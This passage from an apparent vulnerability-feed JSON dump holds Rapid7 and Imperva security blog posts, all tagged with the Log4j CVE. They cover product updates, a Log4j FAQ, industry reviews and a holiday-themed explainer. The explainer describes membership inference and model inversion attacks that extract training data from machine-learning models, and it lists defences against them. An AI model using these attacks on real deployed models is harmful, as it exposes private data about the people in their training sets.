You can utilize the RRN as a search in log search or in the global search (which will link to users and accounts or assets and endpoints pages) to assist with more reliable searches for investigation processes.\n\n_New \u201cr7_context\" Rapid7 Resource Name (RRN) data in Log Search_\n\n****Event source updates****\n\n * ****Log Line Attribution for Palo Alto Firewall & VPN, Proofpoint TAP, Fortinet Fortigate****: When setting up an event source you now have an option to leverage information directly present in source log lines, rather than relying solely on InsightIDR's traditional attribution engine.\n * ****Cylance Protect Cloud event source****: You can [configure CylancePROTECT cloud](<https://docs.rapid7.com/insightidr/cylanceprotect-cloud/>) to send detection events to InsightIDR to generate virus infection and third-party alerts.\n * ****InsightIDR Event Source listings available in the ****[****Rapid7 Extensions Hub****](<https://extensions.rapid7.com/extension/?product=IDR>): Easily access all InsightIDR event source related content in a centralized location.\n\n## Updates to Network Traffic Analysis capabilities\n\n****Insight Network Sensor optimized for 10Gbs+ deployments****: We have introduced a range of performance upgrades that make high-speed traffic analysis more accessible using off-the-shelf hardware, so you're able to gain east-west and north-south traffic visibility within physical, virtual and cloud based networks. If you want to take full advantage of these updates check out the updated sensor requirements [here](<https://docs.rapid7.com/sensor/network-sensor-host-system-requirements/>).\n\n****InsightIDR Asset Page Updates****: We have introduced additional data elements and visuals to the Assets page. This delivers greater context for investigations and enables faster troubleshooting, as assets and user information is in one location. 
All customers have access to:\n\n * Top IDS events triggered by asset\n * Top DNS queries\n\nFor customers with Insight Network Sensors and ENTA, these additional elements are available:\n\n * Top Applications\n * Countries by Asset Location\n * Top Destination IP Addresses\n\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://help.rapid7.com/insightidr/release-notes/>) as we continue to highlight the latest in detection and response at Rapid7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-06T20:41:17", "type": "rapid7blog", "title": "What's New in InsightIDR: Q4 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-06T20:41:17", "id": "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "href": "https://blog.rapid7.com/2022/01/06/whats-new-in-insightidr-q4-2021-in-review/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-14T15:27:09", "description": "\n\n_**Editor\u2019s note: **We 
had planned to publish our _[_Hacky Holidays_](<https://www.rapid7.com/blog/series/hacky-holidays/hacky-holidays-2021/>)_ blog series throughout December 2021 \u2013 but then _[_Log4Shell_](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_ happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it\u2019s 2022, we\u2019re feeling in need of some holiday cheer, and we hope you\u2019re still in the spirit of the season, too. Throughout January, we\u2019ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let\u2019s pick up where we left off._\n\nSanta\u2019s task of making the nice and naughty list has gotten a lot harder over time. According to estimates, there are around [2.2 billion children in the world](<https://www.humanium.org/en/children-world/>). That\u2019s a lot of children to make a list of, much less check it twice! So like many organizations with big data problems, Santa has turned to machine learning to help him solve the issue and built a classifier using historical naughty and nice lists. This makes it easy to let the algorithm decide whether they\u2019ll be getting the gifts they\u2019ve asked for or a lump of coal.\n\n\n\nSanta\u2019s lists have long been a jealously guarded secret. After all, being on the naughty list can turn one into a social pariah. Thus, Santa has very carefully protected his training data \u2014 it\u2019s locked up tight. Santa has, however, made his model\u2019s API available to anyone who wants it. That way, a parent can check whether their child is on the nice or naughty list.\n\nSanta, being a just and equitable person, has already asked his data elves to tackle issues of [algorithmic bias](<https://en.wikipedia.org/wiki/Algorithmic_bias>). 
Unfortunately, these data elves have overlooked some issues in machine learning security. Specifically, the issues of membership inference and model inversion.\n\n## Membership inference attacks\n\nMembership inference is a class of machine learning attacks that allows a naughty attacker to query a model and ask, in effect, \u201cWas this example in your training data?\u201d Using the techniques of [Salem et al.](<https://arxiv.org/abs/1806.01246>) or a tool like [PrivacyRaven](<https://github.com/trailofbits/PrivacyRaven>), an attacker can train a model that figures out whether or not a model has seen an example before.\n\n\n\nFrom a technical perspective, we know that there is some amount of memorization in models, and so when they make their predictions, they are more likely to be confident on items that they have seen before \u2014 in some ways, \u201cmemorizing\u201d examples that have already been seen. We can then create a dataset for our \u201cshadow\u201d model \u2014 a model that approximates Santa\u2019s nice/naughty system, trained on data that we\u2019ve collected and labeled ourselves.\n\nWe can then take the training data and label the outputs of this model with a \u201cTrue\u201d value \u2014 it was in the training dataset. Then, we can run some additional data through the model for inference and collect the outputs and label it with a \u201cFalse\u201d value \u2014 it was not in the training dataset. It doesn\u2019t matter if these in-training and out-of-training data points are nice or naughty \u2014 just that we know if they were in the \u201cshadow\u201d training dataset or not. 
Using this \u201cshadow\u201d dataset, we train a simple model to answer the yes-or-no question: \u201cWas this in the training data?\u201d Then, we can turn our naughty algorithm against Santa\u2019s model \u2014 \u201cDear Santa, was this in your training dataset?\u201d This lets us take real inputs to Santa\u2019s model and find out if the model was trained on that data \u2014 effectively letting us de-anonymize the historical nice and naughty lists!\n\n## Model inversion\n\nNow being able to take some inputs and de-anonymize them is fun, but what if we could get the model to just tell us all its secrets? That\u2019s where model inversion comes in! [Fredrikson _et al._](<https://www.cs.cmu.edu/~mfredrik/papers/fjr2015ccs.pdf>) proposed model inversion in 2015 and really opened up the realm of possibilities for extracting data from models. Model inversion seeks to take a model and, as the name implies, turn the output we can see into the training inputs. Today, extracting data from models has been done at scale by the likes of [Carlini _et al._](<https://www.usenix.org/system/files/sec21-carlini-extracting.pdf>), who have managed to extract data from large language models like GPT-2.\n\nIn model inversion, we aim to extract memorized training data from the model. This is easier with generative models than with classifiers, but a classifier can be used as part of a larger model called a Generative Adversarial Network (GAN). We then sample the generator, requesting text or images from the model. Then, we use the membership inference attack mentioned above to identify outputs that are more likely to belong to the training set. We can iterate this process over and over to generate progressively more training set-like outputs. 
In time, this will provide us with memorized training data.\n\nNote that model inversion is a much heavier lift than membership inference and can\u2019t be done against all models all the time \u2014 but for models like Santa\u2019s, where the training data is so sensitive, it\u2019s worth considering how much we might expose! To date, model inversion has only been conducted in lab settings on models for text generation and image classification, so whether or not it could work on a binary classifier like Santa\u2019s list remains an open question.\n\n## Mitigating model mayhem\n\nNow, if you\u2019re on the other side of this equation and want to help Santa secure his models, there are a few things we can do. First and foremost, we want to log, log, log! In order to carry out the attacks, the model \u2014 or a very good approximation \u2014 needs to be available to the attacker. If you see a suspicious number of queries, you can filter IP addresses or rate limit. Additionally, limiting the return values to merely \u201cnaughty\u201d or \u201cnice\u201d instead of returning the probabilities can make both attacks more difficult.\n\nFor extremely sensitive applications, the use of differential privacy or optimizing with [DPSGD](<https://arxiv.org/abs/1607.00133>) can also make it much more difficult for attackers to carry out their attacks, but be aware that these techniques come with some accuracy loss. As a result, you may end up with some nice children on the naughty list and a naughty hacker on your nice list.\n\nSanta making his list into a model will save him a whole lot of time, but if he\u2019s not careful about how the model can be queried, it could also lead to some less-than-jolly times for his data. Membership inference and model inversion are two types of privacy-related attacks that models like this may be susceptible to. 
As a best practice, Santa should:\n\n * Log information about queries like:\n * IP address\n * Input value\n * Output value\n * Time\n * Consider differentially private model training\n * Limit API access\n * Limit the information returned from the model to label-only\n\n**More Hacky Holidays blogs**\n\n * [The 2021 Naughty and Nice Lists: Cybersecurity Edition](<https://www.rapid7.com/blog/post/2022/01/10/the-2021-naughty-and-nice-lists-cybersecurity-edition/>)\n * [2022 Cybersecurity Predictions: The Experts Clear Off the Crystal Ball](<https://www.rapid7.com/blog/post/2022/01/06/2022-cybersecurity-predictions-the-experts-clear-off-the-crystal-ball/>)\n * [Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors](<https://www.rapid7.com/blog/post/2022/01/05/rapid7-2021-wrap-up-highlights-from-a-year-of-empowering-the-protectors/>)\n * [Metasploit 2021 Annual Wrap-Up](<https://www.rapid7.com/blog/post/2022/01/05/metasploit-2021-annual-wrapup/>)\n * [5 Security Projects That Are Giving Back](<https://www.rapid7.com/blog/post/2022/01/04/5-security-projects-that-are-giving-back/>)\n * [Sharing the Gifts of Cybersecurity \u2013 Or, a Lesson From My First Year Without Santa](<https://www.rapid7.com/blog/post/2022/01/03/sharing-the-gifts-of-cybersecurity-or-a-lesson-from-my-first-year-without-santa/>)\n * [Hacky Holidays: Celebrating the Best of Security Nation [Video]](<https://www.rapid7.com/blog/post/2021/12/13/hacky-holidays-celebrating-the-best-of-security-nation-video/>)\n * [Hacky Holidays From Rapid7! 
Announcing Our New Festive Blog Series](<https://www.rapid7.com/blog/post/2021/12/02/hacky-holidays-from-rapid7-announcing-our-new-festive-blog-series/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T14:46:41", "type": "rapid7blog", "title": "Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa\u2019s List", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T14:46:41", "id": "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "href": "https://blog.rapid7.com/2022/01/14/being-naughty-to-see-who-was-nice-machine-learning-attacks-on-santas-list/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2022-01-04T12:38:01", "description": "One of the core principles of cybersecurity is not letting things \u201cslip through the cracks\u201d. An effective security posture depends on visibility. 
The more visibility you have into the environments where your data is, the more successful you will be in applying your organization\u2019s security protocols and identifying suspicious behavior.\n\nHere are five cybersecurity issues that may have \u201cslipped through the cracks\u201d which should be visible to you in 2022.\n\n## [5\\. Exploiting third-party applications](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/>)\n\nMany people have characterized 2021 as \u201cthe year of the [software supply chain attack](<https://www.imperva.com/learn/application-security/supply-chain-attack/>)\u201d. Chances are, if you were not following the issue closely, you are now, in light of the new [CVE-2021-44228 vulnerability](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>).\n\n[Zero-day attacks](<https://www.imperva.com/learn/application-security/zero-day-exploit/>), or unpatched security bugs, in commonly used third-party applications are an example of the risks we assume from our software supply chain. Often, incomplete requirements, incorrect assumptions, and time-to-market pressures result in the delivery of less-than-perfect software. Generally speaking, software developers do a good job of eliminating software bugs that cause the program to fail in catastrophic or obvious ways. Unfortunately, security bugs don\u2019t typically cause catastrophic system failures. They simply allow a bad actor to make the software do things it wasn\u2019t intended to do, like stealing other users\u2019 credentials or reading the entire contents of a database. Compounding the problem, the rapid-fire ability of bad actors to take advantage of software vulnerability disclosures and our own justifiably cautious patch processes create an asymmetry, with predictable results. 
It\u2019s rare that an organization will be able to deploy a vendor patch the moment it is made available across all of the necessary locations. Even the best Web Application Firewalls require time to adapt with a new signature update (that must be developed, tested, and deployed) or with an adjustment to a machine learning model, or manual acknowledgment that an anomaly has been detected and should be blocked in the future. Additionally, these \u201cvirtual patches\u201d must be tested in each specific environment prior to deployment to ensure they don\u2019t cause unwanted side effects.\n\nFor more on how to manage software supply chain attacks, get [**5 Key Ways Supply Chain Attacks Occur**](<https://www.imperva.com/resources/resource-library/white-papers/5-key-ways-supply-chain-attacks-occur/>).\n\n## [4\\. Increases in the volume of records stolen](<https://www.imperva.com/resources/resource-library/white-papers/5-key-ways-supply-chain-attacks-occur/>)\n\nThe constant increase in the volume of stolen records is the result of multiple factors. We are living in a digitalization era in which more services are consumed daily, with the majority of them online so the amount of data out there increases every year. More businesses have made a very quick shift into digitalization, which if not done carefully, increases security risk. Information security adoption is slower than the adoption of digital services that make a profit from the addiction to and consumption of the same online services. Such a fast, dramatic change is likely to have security implications. Higher volume, less secure data is now stolen in ever-larger chunks. Organizations need to rethink to protect the growing body of critical business data.\n\nLearn more about this in [**Lessons Learned from Analyzing 100 Data Breaches**](<https://www.imperva.com/resources/resource-library/white-papers/lessons-learned-from-analyzing-100-data-breaches/>).\n\n## [3\\. 
More effective Web Application Firewall Gateway technology](<https://www.imperva.com/blog/impervas-waf-gateway-14-4-protects-enterprises-for-the-post-covid-era/>)\n\nA [recent report](<https://www.verizon.com/business/resources/reports/dbir/>) revealed 39% of all data breaches in 2020 stemmed from web application compromise, a trend that became more pronounced in 2021. Organizations need to get more effective protection from their Web Application Firewalls (WAFs). Here are some of the things your WAF needs to do to take on today\u2019s web application threat vectors:\n\n[More than 24 percent of internet traffic is bad bots](<https://www.imperva.com/resources/resource-library/reports/2020-Bad-Bot-Report/>), so your WAF should offer [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>) that enables true defense-in-depth security in a single stack model.\n\nYour WAF should provide optimized security and performance benefits for your digital protocols from HTTP2 to TLS 1.3. For activities such as dropping more dynamic content from video snip-bits to 3D visuals, your WAF should facilitate your ability to supersize the customer experience from website to smartphone to support your organization\u2019s omnichannel strategies.\n\nLearn more about next-level WAF Gateway [here](<https://www.imperva.com/resources/resource-library/datasheets/imperva-waf-gateway/>).\n\n## [2\\. New bad bot mitigation strategies](<https://www.imperva.com/blog/bad-bots-continue-to-evolve-your-mitigation-strategy-should-too/>)\n\nBad actors are capitalizing on the opportunities that digital transformation creates, particularly through more sophisticated automated bad bot attacks. But tools to thwart these attacks have become more advanced, too. What should you look for in a solution?\n\nA truly \u201cfuture-proof\u201d bad bot solution will be equipped to handle the most sophisticated bad bots. 
It must incorporate machine learning that is capable of identifying real-time bad bot behavior and adapting. It also helps establish a baseline for normal behavior, as well as enable automated detection and response. Your solution should be able to block bots from the very first request they make and protect all your access points: websites, mobile apps, and APIs.\n\nLook for device fingerprinting, allowing the solution to track bot activity across IP addresses and detect browser automation tools. Such tools are capable of processing JavaScript and emulating legitimate browsers, making them more difficult to identify and block. The solution should contain cutting-edge techniques, such as injection of active challenges and honeypots into HTTP traffic, per-URL customization and security controls to fine-tune protection; graduated controls for rate-limiting, such as by client, device, authentication token, or simple IP address; and enable community-sourced threat intelligence to help customers learn from one another.\n\nLearn more in [**Imperva\u2019s Ten Essential Capabilities of a Bot Management Solution**](<https://www.imperva.com/resources/resource-library/white-papers/buyers-guide-ten-essential-capabilities-of-a-bot-management-solution/>).\n\n## [1\\. The economic impact of a data security platform](<https://www.imperva.com/blog/infographic-what-is-the-economic-impact-of-a-data-security-platform/>)\n\nVirtually all cybersecurity professionals understand the need to create a data security platform to mitigate threats to sensitive data, but very few people know how to present the acquisition, development, and deployment of a data security platform as a business driver with a demonstrable ROI.\n\nEstablishing a starting point for the evolution of your data security platform can make all the difference. Articulating the challenges that your organization faces is the first step. Mapping these challenges to quantifiable benefits is the next. 
Having a framework from which to start saves time because your team can modify data points to align with your organization\u2019s requirements. For example, regional salary assumptions and the number of systems to be protected. It also will likely open your eyes to scenarios that you may not have thought of, in the actual language from current consumers of data security technology that have already benefited from the transition.\n\nWhile it can be hard to show the economic impact of change, it\u2019s not impossible. Oftentimes it is easier to modify existing work (red pen) than start from scratch (black pen). [Download the infographic](<https://www.imperva.com/resources/resource-library/infographics/the-total-economic-impact-of-the-imperva-data-protection-solution/>), _The Total Economic Impact of the Imperva Data Protection Solution_ to see the key challenges that organizations faced prior to implementing a data security platform and the resulting benefits after deployment.\n\nThe post [2021 in Review, Part 4: 5 Cybersecurity Topics to Watch in 2022](<https://www.imperva.com/blog/2021-in-review-part-4-5-cybersecurity-topics-to-watch-in-2022/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T10:44:57", "type": "impervablog", "title": "2021 in Review, Part 4: 5 Cybersecurity Topics to Watch in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T10:44:57", "id": "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96", "href": "https://www.imperva.com/blog/2021-in-review-part-4-5-cybersecurity-topics-to-watch-in-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T14:37:23", "description": "Today, everyone is talking about CVE-2021-44228, and with good reason. But before that, here were five of the issues that dominated virtual \u201cwater cooler talk\u201d in 2021:\n\n## [5\\. Data security in the cloud](<https://www.imperva.com/blog/whats-different-about-data-security-in-the-cloud-almost-everything/>)\n\nChampion heavyweight boxer Mike Tyson said, \u201cEveryone has a plan until they get punched in the face.\u201d For many security practitioners, their digital transformation plan went out the window when the pandemic punched them in the face. The orderly migration of workloads to a private, public, or hybrid cloud was accelerated but data security in many instances didn\u2019t come along for the ride.\n\nWhen organizations move workloads quickly, they often lose track of where their sensitive data resides. They should create a foundation layer of visibility into the data because doing so addresses most compliance requirements and enables security risk mitigation. To establish some level of baseline behavior, you must know the \u201c6 Ws\u201d of your data. 
Who\u2019s accessing it, what they\u2019re doing with it, why they need it, where they\u2019re accessing it from, when they\u2019re accessing it, and which servers they\u2019re using.\n\nThis is an ambitious plan, but more straightforward than you might think. [Learn more](<https://www.imperva.com/products/sonar-cyber-security-platform/>).\n\n## [4\\. Reprioritizing security requirements](<https://www.imperva.com/blog/reprioritizing-security-requirements-for-2021/>)\n\nAccelerating cloud migration in the middle of a pandemic compelled many cybersecurity professionals to think critically about recalibrating and reprioritizing their organizations\u2019 security requirements. Here are three imperatives:\n\n * **Shift to a zero-trust model where the data resides and around the identity of users.** In this model, the telemetry of tracing where users go, where they\u2019re coming from, and how they\u2019re interfacing and interacting with data becomes the new target for how to secure the assets in your environment.\n * **Get in front of security requirements for cloud-based assets.** Most organizations don\u2019t have a long-standing, solid security posture to go with cloud environments. The \u201c[blank] as a service\u201d approach is introducing ever more risk into the software supply chain and third-party services. Security people need to help business leaders understand the risks of these environments and help manage them.\n * **Manage threat fatigue as you struggle to stay on top of the cyber threat landscape changes.** Learn to identify where the risk is and filter out events with which there is no risk associated. Ultimately, you should have a dashboard that tells you \u201cthis is an event that matters, here is all the other information you need that goes along with this event.\u201d\n\n## [3\\. 
Imperva\u2019s acquisition of CloudVector](<https://www.imperva.com/blog/imperva-to-acquire-cloudvector/>)\n\nOur customers depend on Imperva to be on top of the next big thing. The future of applications and the ways they are compromised start with APIs. They empower businesses to develop applications in new microservice architectures, automate business-to-business processes and provide a back-end for mobile applications. This reality has not been lost on cybercriminals, who have taken notice of the shift towards an API economy and are discovering new attack vectors targeting them. Imperva is set to meet the critical need for organizations to adopt new security measures that can better [protect their APIs](<https://www.imperva.com/products/api-security/>).\n\n## [2\\. Imperva\u2019s recognition as a \u2018Leader\u2019 in The Forrester Wave: DDoS Mitigation Solutions, Q1 2021 Report](<https://www.imperva.com/blog/imperva-recognized-for-performance-in-the-forrester-wave-ddos-mitigation-solutions-q1-2021-report/>)\n\nIn the report, which evaluates DDoS mitigation solution providers to identify and analyze the most significant among them, Forrester describes Imperva as \u201can application security specialist vendor that fields a distributed global network to manage DDoS attacks combined with its own custom appliances (Behemoths) in its data centers to handle the heavy lifting of fighting DDoS attacks\u201d. The report ranks Imperva in the top two in the Current Offering category, and we achieved the highest score available in thirteen of the criteria in the Forrester Wave DDoS Mitigation Solutions Scorecard. You can see the report [here](<https://www.imperva.com/resources/resource-library/reports/the-forrester-wave-ddos-mitigation-solutions-q1-2021/>).\n\n## [1\\. FireEye and SolarWinds breaches](<https://www.imperva.com/blog/2020-ends-with-a-bang/>)\n\nWhile these events occurred in 2020, their repercussions were felt and talked about well into 2021. 
FireEye\u2019s breach included a leak of its red team tools arsenal, and while all of Imperva\u2019s [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) customers were protected from malicious usage of these tools, we saw a rise in attacks based on these tools and vulnerabilities \u2013 and we detected and blocked them all.\n\nThe late 2020 SolarWinds supply chain attack and the subsequent breach had a huge impact. For Imperva customers, we added security controls against two attack vectors \u2013 SUPERNOVA .NET webshell access and SolarWinds Orion API authentication bypass. For several months, we saw massive scanning attempts across Imperva\u2019s customer base, with hackers trying to find systems with vulnerable SolarWinds to exploit.\n\nThe post [2021 in Review, Part 3: 5 Things Security Professionals Were Discussing this Year](<https://www.imperva.com/blog/2021-in-review-part-3-5-things-security-professionals-were-discussing-this-year/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-30T13:26:47", "type": "impervablog", "title": "2021 in Review, Part 3: 5 Things Security Professionals Were Discussing this Year", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-30T13:26:47", "id": "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "href": "https://www.imperva.com/blog/2021-in-review-part-3-5-things-security-professionals-were-discussing-this-year/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T06:45:07", "description": "Since it was disclosed on Friday, December 11, I have spoken with many customers about CVE-2021-44228 and the ways Imperva is working to ensure that [they are protected](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>). Countless others have contacted us with questions about ways to mitigate the impact from the Log4j vulnerability. \n\nIn the spirit of transparency and information sharing, we\u2019ve aggregated below the most common questions we\u2019ve received to date and the answers we\u2019ve been providing to assist our customers through this time. \n\nThis is a complex and evolving situation -- one that takes partnership, diligence and patience. The global Imperva team is dedicated to helping you. We will continue to keep you informed with additional information as it becomes available.\n\n**Q: What is the state of Imperva\u2019s Application Security product posture?**\n\nA: Imperva Cloud Web Application Firewall (WAF), Imperva WAF Gateway and Imperva RASP were not affected by CVE-2021-44228. All Application Security products have the ability to detect and block exploits targeting the CVE.\n\n**Q: Is Imperva implementing rule changes for the Imperva Cloud Web Application Firewall (WAF) to combat Apache Log4j2?**\n\nA: Absolutely. 
We\u2019ve deployed a dozen security rule updates since CVE-2021-44228 was disclosed to help our customers mitigate new attack variants.\n\nWe saw initial attacks attempting to exploit this CVE starting around December 9, 2021 at 18:00 UTC. As said in our initial blog post, our existing security rules put in place for Imperva Cloud WAF customers mitigated these early CVE attacks without requiring any patching. \n\nImperva Threat Research detected new CVE-specific attack variants, resulting in the creation of additional security rules on December 10, 2021 at 5:41 UTC. These updates were tested and deployed to the Imperva Global Network and ThreatRadar Feed on December 10, 2021 at 11:44 UTC. \n\nOver the last few days, we\u2019ve detected new variants and responded by creating and deploying updated rules. Imperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules based on new attack variants. \n\n**Q: What rule changes are being implemented for Imperva WAF Gateway (GW) to combat Apache Log4j2?**\n\nA: After monitoring initial attacks attempting to exploit this CVE starting around December 9, 2021 at 18:00 UTC, Imperva Threat Research immediately began creating additional security rules for Imperva WAF GW. \n\nManual rules were supplied to Imperva WAF GW customers to mitigate CVE-specific attacks. An Imperva Documentation [knowledge base article](<https://docs.imperva.com/howto/9111b8a5>) (login required) contains the signature information for creating the specific rule. This document was updated as of December 13, 2021 15:30 UTC.\n\nCustomers that have Threat Radar Emergency Feed Services received an initial update with these CVE-specific rules on December 10, 2021 11:30 UTC. 
As new variants were discovered, updated rules were published to Threat Radar on December 11, 2021 10:30 UTC, December 11, 2021 3:30 UTC and December 13, 2021 12:20 UTC.\n\nCustomers using Imperva Application Defense Center (ADC) were able to receive an update on December 13, 2021 at 10:00 UTC. ADC content can be updated manually or automatically. For information about configuring ADC, please visit the [ADC Update Guide](<https://docs.imperva.com/bundle/v12.6-administration-guide/page/6874.htm>).\n\nJust like for Cloud WAF, Imperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules for WAF GW based on new attack variants. \n\n**Q: For both Imperva Cloud WAF and Imperva WAF GW, where can I see if I am getting hit by traffic related to this Remote Code Execution (RCE) exploit? Is there a dashboard to help me?**\n\nA: Imperva Cloud WAF customers can see the CVE\u2019s activity in Imperva Attack Analytics (screenshot below).\n\nIncidents in Imperva Attack Analytics can be filtered by this specific CVE (screenshot below).\n\nOnce Imperva WAF GW customers establish the appropriate signatures (manually, via Threat Radar or via ADC), they will be able to see alerts and block events within the MX or within their SIEM, where log events are ingested. The default logging templates should include signature names and events like \u201cCVE-2021-44228: Zero day RCE in Log4j2 via LDAP JNDI parser\u201d.\n\n**Q: If I have Imperva RASP deployed across my Java applications, am I protected?**\n\nA: Yes. Given the nature of how Imperva RASP works, RCEs caused by CVE-2021-44228 were stopped without requiring any code changes or policy updates (additional details below). Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected if Imperva RASP is currently deployed.\n\n**Q: What types of vulnerabilities does Imperva RASP protect out of the box?**\n\nA: Imperva RASP is complementary to Imperva WAF. 
While the latter keeps bad traffic out, RASP mitigates the risk posed by unknown exploits in first- or third-party code/dependencies. By being embedded in the application, RASP has direct visibility into attacks relating to an RCE, which is an advantage for detecting and stopping a specific class of attack.\n\n**Q: Where can I learn more about Imperva RASP?**\n\nA: Imperva RASP is an industry-leading product that is designed to protect against zero-days and the OWASP Top 10 application security threats, injections and weaknesses. Learn more [here](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>).\n\n**Q: Is the Log4j vulnerability impacting any of Imperva's corporate systems (including customer/partner portals and FTP)?**\n\nA: No. Imperva worked quickly to update all vulnerable systems immediately after becoming aware of CVE-2021-44228, including third-party vendor solutions. Additionally, Imperva does not have any corporate external systems that are affected by this specific CVE.\n\n**Q: I need assistance or have questions. Who should I contact?**\n\nA: For customers looking for support, please access the [Imperva Support Portal](<https://support.imperva.com/s/login/?ec=302&startURL=%2Fs%2F>). 
